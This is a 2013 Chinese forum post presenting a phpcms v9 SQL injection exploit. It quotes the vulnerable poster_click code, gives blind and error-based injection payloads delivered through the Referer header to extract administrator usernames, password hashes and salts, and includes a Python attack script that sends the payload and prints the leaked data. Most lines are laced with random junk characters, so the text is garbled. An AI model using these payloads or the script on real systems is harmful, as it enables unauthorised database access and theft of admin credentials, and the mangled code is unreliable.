有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
* S; m4 d& \/ |7 E% Q, w( [$ |! c4 \/ ^% Z% D
问题函数\phpcms\modules\poster\index.php
0 d8 r* Q W0 B* N* K
6 T- n' f2 C( y; Kpublic function poster_click() { l2 t. j. d4 ~0 L: s) @
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;9 l: ?; n O# Q3 \* H: D- K
$r = $this->db->get_one(array('id'=>$id));: n. Q* U0 r2 s3 y# f
if (!is_array($r) && empty($r)) return false;
8 e0 S1 i6 u( ]8 o. {$ D$ip_area = pc_base::load_sys_class('ip_area');0 }1 L; \9 s# C, j5 s; v
$ip = ip();# V4 {3 o( n6 g
$area = $ip_area->get($ip);$ c! H8 R# V5 q! B; L# v' u6 F
$username = param::get_cookie('username') ? param::get_cookie('username') : '';7 K. f2 ?8 P4 Y2 g" O7 t, Z, i1 K
if($id) {
; r9 |! _$ _3 ^. p$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();/ n" X% {5 G/ p8 H: N5 W
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
1 S) G D/ }+ v, _; z}
/ B: O$ Z V8 Q/ l+ X$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
* t4 |; p7 F! Q' b/ a$setting = string2array($r['setting']); I% I8 n1 a/ t7 h% R" h( Q
if (count($setting)==1) {9 M5 f; y1 ~2 d/ ?8 y
$url = $setting['1']['linkurl'];
! T& D; c4 J- [. J} else {( P5 o. J: h5 w. F q, ?
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];$ m, H! M: l$ W: V
}
; r5 p ]* Q4 A2 a4 bheader('Location: '.$url); k" s" h% q% N' V
}+ a. p* F3 `# B# @! j1 K
6 p7 J. G2 a4 p# W9 I; g% R
5 w- R# d0 g) _7 N) P; C0 e5 u; s; U) n! \7 s; r
利用方式:7 i6 k ?+ M1 r4 k4 H3 r% o9 M
3 M* }) Z% r3 \# f7 ~) B# t0 ?2 S
1、可以采用盲注入的手法:
* C7 X! F/ S$ g: ~: p% H
' X$ x% H3 y& t: Sreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
: x* l9 L8 T2 Q2 |. Z7 c" B7 l; f( b- k! v0 ]- O
通过返回页面,正常与否一个个猜解密码字段。2 |: K* K5 Y+ @8 P, d/ w
8 b- O" C) q- B
2、代码是花开写的,随手附上了:
- i' R/ r8 e* `7 i4 b. l. `: c; }
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#3 v3 e9 k9 ~/ u( B* H5 h
1 F5 R; l5 \* `" g
此方法是爆错注入手法,原理自查。1 c( S6 Y8 z9 Z7 ?( E1 t
/ E2 ]( n( F; @! q3 _5 Z
/ S' R% x) E7 H3 c+ R; b" [
$ ~4 [: }; o* c利用程序:
1 {. w0 p5 b- V' t) F5 P) H, I7 R* O
#!/usr/bin/env python
& q- s9 L8 X, A1 E7 P# Vimport httplib,sys,re
" R% q) Q6 C1 i0 ?7 f
2 Y( d p( _' f- W/ M# idef attack():
) p+ ?5 E" {2 ?print “Code by Pax.Mac Team conqu3r!”& i& ?9 Y( u7 @4 t6 B, d
print “Welcome to our zone!!!”* U2 o" e9 v3 l, V
url=sys.argv[1]
5 ]5 u" X* m: d: _5 rpaths=sys.argv[2]
* J3 Q! k( f4 s. _* Qconn = httplib.HTTPConnection(url)
; K( c! A @. p1 F) d* Yi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,% o; a! w1 @; H7 G
“Accept”: “text/plain”,
. t/ l. V& ^; b( J5 I6 z# P“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
5 k( {! a- d' o% i# s7 F; vconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
5 b% y) n( b: _6 F; ~r1 = conn.getresponse()$ ^% B! J: b1 ]5 X
datas=r1.read()
) a1 N v6 y0 Z( Cdatas=re.findall(r”Duplicate entry \’\w+’”, datas)+ C' F4 ]) I% @9 }8 g; D' m
print datas[0]
. A( T" @/ N- l6 t# N! [conn.close()
! c* {- @( F8 ~" z5 \5 nif __name__==”__main__”:
* X6 z9 P3 k3 ?* q$ j9 `( t: xif len(sys.argv)<3:$ U# `8 s& a: I2 \' z& Z9 {9 }7 u
print “Code by Pax.Mac Team conqu3r”
$ s& L# J; f5 ~print “Usgae:”$ @ M- P* C7 I
print “ phpcmsattack.py www.paxmac.org /”
2 z! Q: [3 X/ Y, Hprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
* k, i: ~, y: q5 m- x% ~, _4 Tsys.exit(1)' K+ m. F) s, n/ m0 j
attack()6 f+ q1 t( Z. L# m# @
3 Y7 u( s; _! O
|
发表于 2013-1-11 21:01:00
收藏
支持
反对